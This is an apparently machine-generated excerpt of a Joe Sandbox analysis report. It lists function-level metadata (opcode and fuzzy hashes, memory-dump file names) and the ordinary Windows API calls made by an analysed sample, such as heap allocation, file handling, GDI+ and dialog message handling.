              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: e5957087ce97491a89643b771b3997f236761280d7c41011b7dc2eef87049bd9
              • Instruction ID: 231e15b4468a13a27d198c7459656a2129d086bbbc5ec5a935000eac13efe4d3
              • Opcode Fuzzy Hash: e5957087ce97491a89643b771b3997f236761280d7c41011b7dc2eef87049bd9
              • Instruction Fuzzy Hash: 3AC1A130A042549FEF55CF68CC98BA97BA5FF0A324F0844B9EC46DB2C6CB759944CB61
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: ad48208263684153754182374eb82275626e8e791469750926bf77ae0933d7e3
              • Instruction ID: 83daa4b8e043d82be091761a57ee238d7786c51b251cea73a19073be16261367
              • Opcode Fuzzy Hash: ad48208263684153754182374eb82275626e8e791469750926bf77ae0933d7e3
              • Instruction Fuzzy Hash: CF71AE71104B44AEDB65DB74CC51AE7B7ECFF14301F44496EE5AAC7282DA326A48CF12
              APIs
              • __EH_prolog.LIBCMT ref: 00808384
                • Part of subcall function 00801380: __EH_prolog.LIBCMT ref: 00801385
                • Part of subcall function 00801380: new.LIBCMT ref: 008013FE
                • Part of subcall function 008019A6: __EH_prolog.LIBCMT ref: 008019AB
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 6766383c307a608132c382b8dbf6386821a473d896e7537c1a7ac182aefbea0b
              • Instruction ID: c084c2bccd14335952a42cd2aaa4eca60e653639808ee946b63dc8c6755baf63
              • Opcode Fuzzy Hash: 6766383c307a608132c382b8dbf6386821a473d896e7537c1a7ac182aefbea0b
              • Instruction Fuzzy Hash: DD41BE31900A589ADF60EB64CC55BEAB3A8FF50310F0440EAA58AE30D3DF745AC8DB51
              APIs
              • __EH_prolog.LIBCMT ref: 00801E05
                • Part of subcall function 00803B3D: __EH_prolog.LIBCMT ref: 00803B42
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 6c75c4f5ac73634608c2f1cc8e091d3a3c4da049f5331dc2bf0447a4a424b63d
              • Instruction ID: 9e2085ce71549c6d3a394472eb6d59062ad647a45e5ab33fcc2ed52d6e0e7c75
              • Opcode Fuzzy Hash: 6c75c4f5ac73634608c2f1cc8e091d3a3c4da049f5331dc2bf0447a4a424b63d
              • Instruction Fuzzy Hash: A72126729041089FCF55EF98DD599EEBBFAFF58314B1000ADE845A7291CB325E50CB61
              APIs
              • __EH_prolog.LIBCMT ref: 0081A7C8
                • Part of subcall function 00801380: __EH_prolog.LIBCMT ref: 00801385
                • Part of subcall function 00801380: new.LIBCMT ref: 008013FE
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 576782b3898ce7a46832cb04b427318a4d812ea8d5af89587818daf4e5af16cf
              • Instruction ID: 868e39e1964403cd08f14bf6048cbb45135ffeb401da0aa574ccb99bde8c30d0
              • Opcode Fuzzy Hash: 576782b3898ce7a46832cb04b427318a4d812ea8d5af89587818daf4e5af16cf
              • Instruction Fuzzy Hash: E6216D71C052499ECF19DF98C9529EEB7B8FF19314F0004AAE809E7242DB356E46CB62
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: eda3bfe8eed8dc2dea0979f76f96f0839f16ab0612ad9ab6d71a4dd7a565a7a1
              • Instruction ID: 11def881f3d1457cf8b2d7bf89b1acbe9ff6b78d8165a9ab1d720eaa6d1abf46
              • Opcode Fuzzy Hash: eda3bfe8eed8dc2dea0979f76f96f0839f16ab0612ad9ab6d71a4dd7a565a7a1
              • Instruction Fuzzy Hash: A8117C73E005289BCF62AFACCC529DEB736FF88750F054215F844E72D2CA349D108AA1
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction ID: f6d8b0dc9e84eacb7284fa4d79b427754060b167606724acbcaf2778bae0ffab
              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction Fuzzy Hash: 72F081306107159FDBB8DA68CD4575677D8FB15330F20891AE496C66C0E770D880C752
              APIs
              • __EH_prolog.LIBCMT ref: 00805BDC
                • Part of subcall function 0080B07D: __EH_prolog.LIBCMT ref: 0080B082
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 3d89a328b5cb00b243e4c7166652881781e46e6217859a83ef5f27c49a6f2252
              • Instruction ID: 2e6cf696c58aacabfc176badd3a6fe6fb0dff7a3c7160c6557a63f4e5c41ba9f
              • Opcode Fuzzy Hash: 3d89a328b5cb00b243e4c7166652881781e46e6217859a83ef5f27c49a6f2252
              • Instruction Fuzzy Hash: BF016230A15644DAC725F7A8C4557DDF7A4EF59700F80819DA95D932C3CBB41B09C663
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 1af684703af6e0f07e8af29446c997eb91225fc36f2cceb95a6d0b84fa8f4310
              • Instruction ID: b06588df70b1d840d0a9efd770b38941dfcbe4e2b974f593bdf4e28d97d018cd
              • Opcode Fuzzy Hash: 1af684703af6e0f07e8af29446c997eb91225fc36f2cceb95a6d0b84fa8f4310
              • Instruction Fuzzy Hash: B4E0A021542535DAEF212B69BE04B5A3BC8FB413B0F150211A814E2082CF248CC085A6
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0080A4F5
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: 8fa442d520e010fc2c9382dc86be7c63de5f1fc3848338a1315374a6d57315a5
              • Instruction ID: e65a0774b57ef89a2c0a0c30863dc41571208614e76b2e04132e7a8636bac121
              • Opcode Fuzzy Hash: 8fa442d520e010fc2c9382dc86be7c63de5f1fc3848338a1315374a6d57315a5
              • Instruction Fuzzy Hash: 49F0B435008780AACBB65BBC4C047D6BB90FF16361F04CA49F1FE821D1C27814859723
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 008106B1
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: c4f2b9ae6d307d5846134ed62e971f4168624fe0a3ca5f3948b3e3288d79a895
              • Instruction ID: 3a683406830eadb845c74dd27b2453bd51ab98c333b71618ad40fac2078d0305
              • Opcode Fuzzy Hash: c4f2b9ae6d307d5846134ed62e971f4168624fe0a3ca5f3948b3e3288d79a895
              • Instruction Fuzzy Hash: 74D0C22420421029CA65336CAC497FF1B0EFFC2710F180021B64DD36C79E9A08DA8AA3
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00819D81
                • Part of subcall function 00819B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00819B30
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction ID: 4ab27a7ba95e9f74af968ac49ace06d271f1c7c03112f8783e3197e4b34fd095
              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction Fuzzy Hash: 10D0C77065820D7ADF41BB759C229FA7BADFF00350F104165FC48D6151EE71DE90A662
              APIs
              • GetFileType.KERNELBASE(000000FF,00809887), ref: 00809995
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 8599151507c82df533226f238738a17d3e0788e2b9720dc69054cc2c16662170
              • Instruction ID: 724f2a092b7d9c9cf4f3c8a3d97ebfea939ed9903c0595aec39be6cabb863adc
              • Opcode Fuzzy Hash: 8599151507c82df533226f238738a17d3e0788e2b9720dc69054cc2c16662170
              • Instruction Fuzzy Hash: 46D01231111540A5CFA546394D090997F51FB83376B38CAA8D0A5C40E2D723C803F581
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0081D43F
                • Part of subcall function 0081AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081AC85
                • Part of subcall function 0081AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081AC96
                • Part of subcall function 0081AC74: IsDialogMessageW.USER32(00010450,?), ref: 0081ACAA
                • Part of subcall function 0081AC74: TranslateMessage.USER32(?), ref: 0081ACB8
                • Part of subcall function 0081AC74: DispatchMessageW.USER32(?), ref: 0081ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: 23d2939630b1a11575192200c9f31471096c1fbad8057fd9417f05ae76f70fdb
              • Instruction ID: 01f9835444392904ccbaa614654e2e679f0dbed603173d6c3ff855944553e16c
              • Opcode Fuzzy Hash: 23d2939630b1a11575192200c9f31471096c1fbad8057fd9417f05ae76f70fdb
              • Instruction Fuzzy Hash: 13D09E31144300ABD6162B51CE06F0FBAA6FB89B04F004954B344B40F28662AD20EB16
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 534e801464dbda9d05f174e2163e7614bb9e4c72270a6a714aec915a4d7257d8
              • Instruction ID: a736957d42181ff7cb21305d6a0d28ba847d40f7cd5043a10c8e13df7a5ef6fc
              • Opcode Fuzzy Hash: 534e801464dbda9d05f174e2163e7614bb9e4c72270a6a714aec915a4d7257d8
              • Instruction Fuzzy Hash: 4DB012D526C7017D310C22446C52E7B020CFCC3B50331497AB20BE00C0D8406CCD4432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 5bf03f9a6b0b0e96997aed4c8e3ca710c8aa1e17b7a608efb4e18ff897a7ffad
              • Instruction ID: 482531f3ad9b884231b0264e69c801700461ec0f3381969d1629938f88cc2ffe
              • Opcode Fuzzy Hash: 5bf03f9a6b0b0e96997aed4c8e3ca710c8aa1e17b7a608efb4e18ff897a7ffad
              • Instruction Fuzzy Hash: 0EB012D526C7056C310C62486C42F7B020CFCC2B10330442AB20BD01C0D8406C890532
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 53ca328d59372d3f64516495c36ec41c456a0a61edb46be533cdf2fc396d77e1
              • Instruction ID: 38ae71d564975c7b8b198f0b15454ab4cdfce92ae12b1af59620ec90467aa712
              • Opcode Fuzzy Hash: 53ca328d59372d3f64516495c36ec41c456a0a61edb46be533cdf2fc396d77e1
              • Instruction Fuzzy Hash: A0B012D126C6016C310C624C6C02F76020CFCC3B10330C46AB60BE02C0D8406C8E0432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ab5b52ec2be0e8babacdad79f157aabfe002e6df0cf38003a4bfe180a7d2cf8b
              • Instruction ID: 92f4ec55100f55105e51116d79b17338ac5e7d656c5fa432583bc97381bc8c7b
              • Opcode Fuzzy Hash: ab5b52ec2be0e8babacdad79f157aabfe002e6df0cf38003a4bfe180a7d2cf8b
              • Instruction Fuzzy Hash: 41B012D127C7016D314C624C6C02F76020CFCC2B50331856AB20BE02C0D8406CCE0432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
